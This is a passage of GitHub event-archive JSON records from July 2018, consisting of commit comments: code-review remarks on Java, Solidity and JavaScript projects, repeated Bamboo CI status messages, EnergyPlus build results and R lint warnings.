test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:01:34Z"}
{"id":"7969711973","type":"CommitCommentEvent","actor":{"login":"zcshi"},"repo":{"name":"alibaba/dubbo-spring-boot-starter"},"payload":{"comment":{"id":29718093,"position":null,"line":null,"path":null,"commit_id":"6f19257ce4647726318be96e56c89b059078783a","created_at":"2018-07-16T10:01:59Z","updated_at":"2018-07-16T10:01:59Z","author_association":"NONE","body":"我用你的源码打包后 有提示了"}},"created_at":"2018-07-16T10:01:59Z"}
{"id":"7969713313","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29718097,"position":42,"line":42,"path":"src/main/java/abc/Group.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T10:02:15Z","updated_at":"2018-07-16T10:02:15Z","author_association":"COLLABORATOR","body":"convertToListOfSudents because you work with list of strings not with 1 string"}},"created_at":"2018-07-16T10:02:15Z"}
{"id":"7969715702","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718102,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-16T10:02:45Z","updated_at":"2018-07-16T10:02:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:02:45Z"}
{"id":"7969715794","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29718103,"position":50,"line":50,"path":"src/main/java/abc/Group.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T10:02:46Z","updated_at":"2018-07-16T10:02:46Z","author_association":"COLLABORATOR","body":" List<Integer> limitedList = new ArrayList<Integer>(mainList.subList(0,5));"}},"created_at":"2018-07-16T10:02:46Z"}
{"id":"7969718415","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29718105,"position":null,"line":null,"path":null,"commit_id":"41f8e39f4bc39100fbd959e3a116f096f5f42629","created_at":"2018-07-16T10:03:18Z","updated_at":"2018-07-16T10:03:18Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - i386-Windows-7-VisualStudio-14: OK (2942 of 2942 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-16T10:03:18Z"}
{"id":"7969721012","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718111,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-16T10:03:49Z","updated_at":"2018-07-16T10:03:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:03:49Z"}
{"id":"7969721407","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29718113,"position":31,"line":26,"path":"test/Remittance.js","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T10:03:55Z","updated_at":"2018-07-16T10:03:55Z","author_association":"NONE","body":"I don't think it is a good idea to hard-number your tests because if you swap the order then you have more work to do."}},"created_at":"2018-07-16T10:03:55Z"}
{"id":"7969721470","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718114,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-16T10:03:56Z","updated_at":"2018-07-16T10:03:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:03:56Z"}
{"id":"7969725128","type":"CommitCommentEvent","actor":{"login":"mbrodala"},"repo":{"name":"NamelessCoder/typo3-cms-fluid-precompiler"},"payload":{"comment":{"id":29718130,"position":8,"line":4,"path":"composer.json","commit_id":"4e9c882106b8dc03e1bd62b6dc13f3b62c8c0a02","created_at":"2018-07-16T10:04:39Z","updated_at":"2018-07-16T10:04:39Z","author_association":"COLLABORATOR","body":"Notice that `^9 < 9.4` would be safer but I don't expect a real breakage until v9 LTS."}},"created_at":"2018-07-16T10:04:39Z"}
{"id":"7969725303","type":"CommitCommentEvent","actor":{"login":"seladoor"},"repo":{"name":"seladoor/analisi_dati_git"},"payload":{"comment":{"id":29718132,"position":null,"line":null,"path":null,"commit_id":"a00c3c8880a90df275721713d08e34a393c812f9","created_at":"2018-07-16T10:04:41Z","updated_at":"2018-07-16T10:04:41Z","author_association":"OWNER","body":"..\r\n"}},"created_at":"2018-07-16T10:04:41Z"}
{"id":"7969726548","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29718135,"position":33,"line":28,"path":"test/Remittance.js","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T10:04:57Z","updated_at":"2018-07-16T10:04:57Z","author_association":"NONE","body":"If the `assert` fail I think your test will time out. You should `try { assert() } catch(done)`.\r\nComplicated. Just don't use `done` and the test is only the `assert`."}},"created_at":"2018-07-16T10:04:57Z"}
{"id":"7969727372","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718137,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-16T10:05:08Z","updated_at":"2018-07-16T10:05:08Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:05:08Z"}
{"id":"7969727919","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29718140,"position":34,"line":34,"path":"src/main/java/abc/Speciality.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T10:05:14Z","updated_at":"2018-07-16T10:05:14Z","author_association":"COLLABORATOR","body":"you need to use do-while cause this code should be executed at least once."}},"created_at":"2018-07-16T10:05:14Z"}
{"id":"7969728174","type":"CommitCommentEvent","actor":{"login":"ib00sh"},"repo":{"name":"ib00sh/Less_04"},"payload":{"comment":{"id":29718141,"position":null,"line":null,"path":null,"commit_id":"901ed98868d662127066e0d7cd97c7f1e1bb447a","created_at":"2018-07-16T10:05:17Z","updated_at":"2018-07-16T10:05:17Z","author_association":"OWNER","body":"с"}},"created_at":"2018-07-16T10:05:17Z"}
{"id":"7969730164","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29718147,"position":48,"line":38,"path":"test/Remittance.js","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T10:05:42Z","updated_at":"2018-07-16T10:05:42Z","author_association":"NONE","body":"Remove the `.catch(done)`, the `done()` above and the `done` in `function(done)`. That will just the same, but more readable."}},"created_at":"2018-07-16T10:05:42Z"}
{"id":"7969731271","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29718150,"position":53,"line":53,"path":"src/main/java/abc/Speciality.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T10:05:54Z","updated_at":"2018-07-16T10:05:54Z","author_association":"COLLABORATOR","body":"The same as I wrote somewere in this review"}},"created_at":"2018-07-16T10:05:54Z"}
{"id":"7969733308","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718152,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-16T10:06:20Z","updated_at":"2018-07-16T10:06:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:06:20Z"}
{"id":"7969734645","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29718159,"position":79,"line":52,"path":"test/Remittance.js","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T10:06:35Z","updated_at":"2018-07-16T10:06:35Z","author_association":"NONE","body":"Don't aggressively convert to Javascript numbers. Keep it as it is, a BogNumber."}},"created_at":"2018-07-16T10:06:35Z"}
{"id":"7969738043","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29718166,"position":86,"line":59,"path":"test/Remittance.js","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T10:07:20Z","updated_at":"2018-07-16T10:07:20Z","author_association":"NONE","body":"`newContBalance.minus(contractBalance).toString(10)`."}},"created_at":"2018-07-16T10:07:20Z"}
{"id":"7969738369","type":"CommitCommentEvent","actor":{"login":"c-umadevi"},"repo":{"name":"c-umadevi/ruby-getting-started"},"payload":{"comment":{"id":29718169,"position":null,"line":null,"path":null,"commit_id":"ef47301832e48e3388e032d587adb7d5ffd5b016","created_at":"2018-07-16T10:07:25Z","updated_at":"2018-07-16T10:07:25Z","author_association":"OWNER","body":"updated"}},"created_at":"2018-07-16T10:07:25Z"}
{"id":"7969738889","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718172,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-16T10:07:32Z","updated_at":"2018-07-16T10:07:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:07:32Z"}
{"id":"7969739463","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718173,"position":18,"line":18,"path":"README.md","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:07:39Z","updated_at":"2018-07-16T10:07:39Z","author_association":"COLLABORATOR","body":"typo coverage\r\n"}},"created_at":"2018-07-16T10:07:39Z"}
{"id":"7969740911","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29718176,"position":69,"line":50,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T10:07:59Z","updated_at":"2018-07-16T10:07:59Z","author_association":"OWNER","body":"My intention was that I, as an owner, can agree different fees with different customers. \r\nI will agree a fee with Alice for her payment and another one with Dave. \r\nIt is their duty to `createPayment` with the fee we've agreed on. \r\nI have just realized though that I have not implemented the logic to take care of the scenario in which they ignore that request and send a fee equal to 0. \r\nPerhaps not a good idea to allow that flexibility?"}},"created_at":"2018-07-16T10:07:59Z"}
{"id":"7969744066","type":"CommitCommentEvent","actor":{"login":"SUNYUNRUI2016"},"repo":{"name":"SUNYUNRUI2016/sunyr"},"payload":{"comment":{"id":29718179,"position":null,"line":null,"path":null,"commit_id":"53a4ad966aff6d35cfba0be1e0f5d2d7cdc1b140","created_at":"2018-07-16T10:08:42Z","updated_at":"2018-07-16T10:08:42Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-16T10:08:42Z"}
{"id":"7969744197","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718180,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-16T10:08:43Z","updated_at":"2018-07-16T10:08:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:08:43Z"}
{"id":"7969745325","type":"CommitCommentEvent","actor":{"login":"kolinger"},"repo":{"name":"Mailu/Mailu"},"payload":{"comment":{"id":29718182,"position":14,"line":16,"path":"postfix/conf/master.cf","commit_id":"a11eb4ba35530595b379ef95b239d4c04ee3e227","created_at":"2018-07-16T10:08:58Z","updated_at":"2018-07-16T10:08:58Z","author_association":"NONE","body":"TLS is managed by ngin. I guess this is just a cleanup?"}},"created_at":"2018-07-16T10:08:58Z"}
{"id":"7969746713","type":"CommitCommentEvent","actor":{"login":"wadler"},"repo":{"name":"plfa/plfa.github.io"},"payload":{"comment":{"id":29718187,"position":null,"line":null,"path":null,"commit_id":"9843951db9b16558b1c27ee5297c120f6fba6d91","created_at":"2018-07-16T10:09:16Z","updated_at":"2018-07-16T10:09:16Z","author_association":"COLLABORATOR","body":"Thanks! "}},"created_at":"2018-07-16T10:09:16Z"}
{"id":"7969747411","type":"CommitCommentEvent","actor":{"login":"NamelessCoder"},"repo":{"name":"NamelessCoder/typo3-cms-fluid-precompiler"},"payload":{"comment":{"id":29718189,"position":8,"line":4,"path":"composer.json","commit_id":"4e9c882106b8dc03e1bd62b6dc13f3b62c8c0a02","created_at":"2018-07-16T10:09:24Z","updated_at":"2018-07-16T10:09:24Z","author_association":"OWNER","body":"As far as the Fluid API is concerned - I don't think there would be any problems. The one thing that could break is in the module package, if the core changes something about how BE modules or cache clears behave. But even that is low-risk, I'd say.\r\n\r\nIn any case I'm sure we'll be on top of it, should a breaking change occur. I'd like to make this package a lot more important than it currently is, due to the first-request stress reduction it brings. That's a frequent complaint about TYPO3 that I hear so it's low-hanging fruit :)"}},"created_at":"2018-07-16T10:09:24Z"}
{"id":"7969747692","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29718190,"position":7,"line":7,"path":"process_csv.rb","commit_id":"82b6c4959b144c56c485e52aef15005a6d62321c","created_at":"2018-07-16T10:09:28Z","updated_at":"2018-07-16T10:09:28Z","author_association":"COLLABORATOR","body":"don't need to declare these - can just use them whenever you want or if you want to be צדיק initialize them in the constructor"}},"created_at":"2018-07-16T10:09:28Z"}
{"id":"7969748188","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29718191,"position":67,"line":53,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-16T10:09:35Z","updated_at":"2018-07-16T10:09:35Z","author_association":"NONE","body":"As a side note, the creation block is already part of the event, because the event is in a block. So a human still has access to this info even if your code does nothing to help."}},"created_at":"2018-07-16T10:09:35Z"}
{"id":"7969748845","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29718193,"position":null,"line":null,"path":null,"commit_id":"41f8e39f4bc39100fbd959e3a116f096f5f42629","created_at":"2018-07-16T10:09:44Z","updated_at":"2018-07-16T10:09:44Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-MacOS-10.9-clang: OK (2781 of 2942 tests passed, 10 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 23 tests had: ERR diffs.\n * 58 tests had: MTR big diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 462\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-41f8e39f4bc39100fbd959e3a116f096f5f42629-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.53%25-yellow.png)</a> \n"}},"created_at":"2018-07-16T10:09:44Z"}
{"id":"7969749661","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718194,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-16T10:09:55Z","updated_at":"2018-07-16T10:09:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:09:55Z"}
{"id":"7969753456","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29718200,"position":null,"line":null,"path":null,"commit_id":"6858bb333914a9baf5b415c5ee82e14e13f6ab07","created_at":"2018-07-16T10:10:46Z","updated_at":"2018-07-16T10:10:46Z","author_association":"OWNER","body":"@cnuke: please add to staging"}},"created_at":"2018-07-16T10:10:46Z"}
{"id":"7969754988","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718205,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-16T10:11:07Z","updated_at":"2018-07-16T10:11:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T10:11:07Z"}
{"id":"7969756249","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29718209,"position":null,"line":null,"path":null,"commit_id":"51ed75bd44b8ac4e03f5f5cd67af28c7c9dbc39c","created_at":"2018-07-16T10:11:24Z","updated_at":"2018-07-16T10:11:24Z","author_association":"OWNER","body":"Following #22 and #18 "}},"created_at":"2018-07-16T10:11:24Z"}
{"id":"7969757326","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29718211,"position":177,"line":61,"path":"src/main/java/abc/University.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T10:11:38Z","updated_at":"2018-07-16T10:11:38Z","author_association":"COLLABORATOR","body":"can be simplified even more:\r\nif(Collections.frequency(names, name) > 1) \r\n      studentsEqualName.addAll (getStudentsByName(name)) , where getStudentsByName return collection of students"}},"created_at":"2018-07-16T10:11:38Z"}
{"id":"7969757494","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29718212,"position":null,"line":null,"path":null,"commit_id":"863b00516adaf3edbe210ae3d794b5e64d0241c9","created_at":"2018-07-16T10:11:40Z","updated_at":"2018-07-16T10:11:40Z","author_association":"NONE","body":"[R/berekenLSVIbasis.R:264:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/berekenLSVIbasis.R#L264) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>        .data$Habitattype,   #en hier zouden extra gegevens uit Data_habitat moeten toegevoegd worden\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:96:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/invoercontroleData_soortenKenmerken.R#L96) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:109:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/invoercontroleData_soortenKenmerken.R#L109) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande code mag weg zodra Gert deze Canonicalname toegevoegd heeft aan de databank\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/863b00516adaf3edbe210ae3d794b5e64d0241c9/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig 